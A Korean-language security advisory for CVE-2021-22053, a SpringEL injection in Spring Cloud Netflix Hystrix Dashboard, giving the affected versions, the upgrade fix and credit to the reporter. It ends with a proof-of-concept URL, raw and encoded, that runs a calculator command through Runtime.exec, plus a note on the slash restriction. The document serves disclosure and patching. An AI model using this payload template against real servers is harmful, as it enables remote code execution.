
Spring Cloud Netflix Hystrix Dashboard 템플릿 해석 취약점 CVE-2021-22053
높음
VMware의 Spring
spring-cloud-netflix-hystrix-dashboard와 spring-boot-starter-thymeleaf를 함께 사용하는 애플리케이션은 뷰 템플릿을 해석하는 동안 요청 URI 경로에 제출된 코드를 실행할 수 있는 방법을 노출합니다. /hystrix/monitor;[사용자 제공 데이터]로 요청이 이루어지면 hystrix/monitor 뒤의 경로 요소가 SpringEL 표현식으로 평가되어 코드 실행으로 이어질 수 있습니다.
별도로 명시되지 않는 한 심각도는 높음입니다.
영향을 받는 버전을 사용하는 사용자는 다음 완화 조치를 적용해야 합니다. 사용자는 2.2.10.RELEASE+로 업그레이드해야 합니다. 다른 조치는 필요하지 않습니다. 이 문제를 해결한 릴리스에는 다음이 포함됩니다.
이 취약점은 SecCoder Security Lab의 threedr3am([email protected])에 의해 식별되고 책임감 있게 보고되었습니다.
2021-11-17: 초기 취약점 보고서 게시됨.
원시:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
인코딩:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
PS. 슬래시('/')는 명령어에 포함될 수 없습니다.